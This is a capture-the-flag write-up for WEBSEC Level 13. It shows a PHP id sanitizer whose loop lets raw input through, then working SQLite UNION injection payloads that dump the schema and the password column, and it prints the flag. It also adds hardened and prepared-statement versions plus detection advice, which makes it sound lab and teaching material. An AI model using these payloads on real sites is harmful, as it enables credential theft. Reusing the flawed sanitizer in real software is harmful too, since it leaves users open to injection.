WEBSEC Level 13
Challenge description
Yet another sqli challenge, or is it? Yes it is. Or… is it?
Initial analysis
```php
<?php
// Reconstructed from the garbled snippet: '$' sigils, quotes and the
// array_unique() name restored. The loop re-evaluates count($tmp) on every
// iteration, and unset() shrinks that count without re-indexing the array.
$tmp = explode(',', $_GET['ids']);
for ($i = 0; $i < count($tmp); $i++) {
    $tmp[$i] = (int)$tmp[$i];
    if ($tmp[$i] < 1) {
        unset($tmp[$i]);
    }
}
$selector = implode(',', array_unique($tmp));
$query = "SELECT user_id, user_privileges, user_name FROM users WHERE (user_id in (" . $selector . "));";
```
Walk through
STEP 1: Payload: 1,2,3
OUTPUT: User user_36 with id 1 has no privileges. User user_13 with id 2 has no privileges. User user_99 with id 3 has no privileges.
STEP 2: Payload: 0,0,0
OUTPUT: User admin with id 0 has all privileges.
STEP 3: Payload: ",,,)) union select 1,2, sql as user_id from sqlite_master--
OUTPUT: User CREATE TABLE users ( user_id INTEGER PRIMARY KEY, user_name TEXT NOT NULL, user_privileges INTEGER NOT NULL, user_password TEXT NOT NULL ) with id 1 has no privileges.
STEP 4: Payload: ",,,)) union select 1,2,user_password as user_id from users--
OUTPUT: User WEBSEC{SQL_injection_in_your_cms,_made_simple} with id 1 has no privileges.
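Why the three leading commas matter is not spelled out above, so here is an added example (my own code, not the challenge source or the author's) that reproduces the sanitizer from the "Initial analysis" snippet next to a hardened version and a prepared-statement builder. Nothing here touches a database; the functions only show what string would reach the query. The `build_prepared` helper assumes a PDO-style `?` placeholder API and SQLite semantics, as in the challenge; those are my assumptions.

```php
<?php
// Added example: the level's sanitizer, reconstructed from the page, beside a
// corrected one. Run with `php example.php`.

// Vulnerable sanitizer as on the page. count($tmp) is re-evaluated on every
// iteration and unset() lowers it without re-indexing, so after enough leading
// elements are dropped $i catches up with the count and the loop stops before
// casting the tail. Those tail elements reach implode() as raw strings.
function selector_vulnerable(string $ids): string {
    $tmp = explode(',', $ids);
    for ($i = 0; $i < count($tmp); $i++) {
        $tmp[$i] = (int)$tmp[$i];
        if ($tmp[$i] < 1) {
            unset($tmp[$i]);
        }
    }
    return implode(',', array_unique($tmp));
}

// Hardened sanitizer: cast every element first, then filter. There is no
// index/count interplay, so no element can reach the query uncast.
function selector_hardened(string $ids): string {
    $ints = array_map('intval', explode(',', $ids));
    $ints = array_filter($ints, fn(int $v): bool => $v >= 1);
    return implode(',', array_unique($ints));
}

// Better still: never splice values into SQL text. Emit one placeholder per
// id and bind the integers (assumed PDO-style placeholders; SQLite accepts an
// empty IN () list, other engines may not, hence the explicit guard).
function build_prepared(string $ids): array {
    $ints = array_values(array_unique(array_filter(
        array_map('intval', explode(',', $ids)),
        fn(int $v): bool => $v >= 1
    )));
    if ($ints === []) {
        // No valid ids: return a query that matches nothing, with no bindings.
        return ["SELECT user_id, user_privileges, user_name FROM users WHERE 0", []];
    }
    $placeholders = implode(',', array_fill(0, count($ints), '?'));
    $sql = "SELECT user_id, user_privileges, user_name FROM users WHERE user_id IN ($placeholders)";
    return [$sql, $ints];
}

// Constructed inputs: the benign request from STEP 1 and the payload from STEP 4.
$inputs = [
    '1,2,3',
    ',,,)) union select 1,2,user_password as user_id from users--',
];

foreach ($inputs as $input) {
    echo "input:      $input\n";
    // Vulnerable path: the benign input gives "1,2,3"; the payload gives
    // ")) union select 1,2,user_password as user_id from users--" verbatim,
    // because the loop exits after unsetting the three empty leading fields.
    echo "vulnerable: (" . selector_vulnerable($input) . ")\n";
    // Hardened path: the payload collapses to "2", the only element that
    // casts to a positive integer.
    echo "hardened:   (" . selector_hardened($input) . ")\n";
    [$sql, $params] = build_prepared($input);
    echo "prepared:   $sql  bound=[" . implode(',', $params) . "]\n\n";
}
```

The vulnerable path prints the injected tail unchanged for the payload, which is exactly the text that lands inside `user_id in (...)` in the page's query; the same input through `selector_hardened` or `build_prepared` yields only the integer `2`. The detection angle for a defender is the same observation: a request parameter that should be a comma-separated list of integers but contains parentheses or SQL keywords is worth logging and alerting on regardless of whether the sanitizer happens to hold.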
Flag
FLAG: WEBSEC{SQL_injection_in_your_cms,_made_simple}
For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.